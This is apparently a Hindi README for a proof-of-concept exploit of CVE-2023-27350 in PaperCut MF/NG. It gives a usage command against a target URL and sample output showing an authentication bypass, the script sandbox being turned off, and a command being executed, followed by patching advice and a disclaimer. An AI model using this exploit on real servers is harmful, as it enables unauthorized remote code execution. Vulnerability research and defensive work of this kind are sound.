
Papercut कमजोरी, प्रभावित संस्करण PaperCut MF या NG संस्करण 8.0 या बाद के (पैच किए गए संस्करणों को छोड़कर) सभी OS प्लेटफार्मों पर हैं।
CVE-2023-27350 को प्रभावित करने वाला POC PaperCut MF/NG
##प्रभावित संस्करण 'PaperCut MF या NG संस्करण 8.0 या उसके बाद (पैच किए गए संस्करणों को छोड़कर) सभी OS प्लेटफ़ॉर्म पर।'
यह POC एक प्रमाणीकरण बाईपास भेद्यता का उपयोग करता है जिसे अंतर्निहित स्क्रिप्टिंग कार्यक्षमता के दुरुपयोग के साथ जोड़कर कोड निष्पादित किया जाता है।
python3 CVE-2023-27350.py --url 'http://10.0.40.56:9191' --command calc.exe
[*] Papercut instance is vulnerable! Obtained valid JSESSIONID
[*] Updating print-and-device.script.enabled to Y
[*] Updating print.script.sandboxed to N
[*] Prepparing to execute...
[+] Executed successfully!
[*] Updating print-and-device.script.enabled to N
[*] Updating print.script.sandboxed to Y
नवीनतम संस्करण में अपडेट करें या PaperCut सुरक्षा सलाहकार के निर्देशों का पालन करके शमन करें।
यह सॉफ़्टवेयर विशुद्ध रूप से अकादमिक अनुसंधान और प्रभावी रक्षा तकनीकों के विकास के उद्देश्यों के लिए बनाया गया है, और इसका उद्देश्य सिस्टम पर हमला करने के लिए उपयोग करना नहीं है, सिवाय उन मामलों के जहां स्पष्ट रूप से अधिकृत किया गया हो। परियोजना अनुरक्षक सॉफ़्टवेयर के दुरुपयोग के लिए जिम्मेदार या उत्तरदायी नहीं हैं। जिम्मेदारी से उपयोग करें।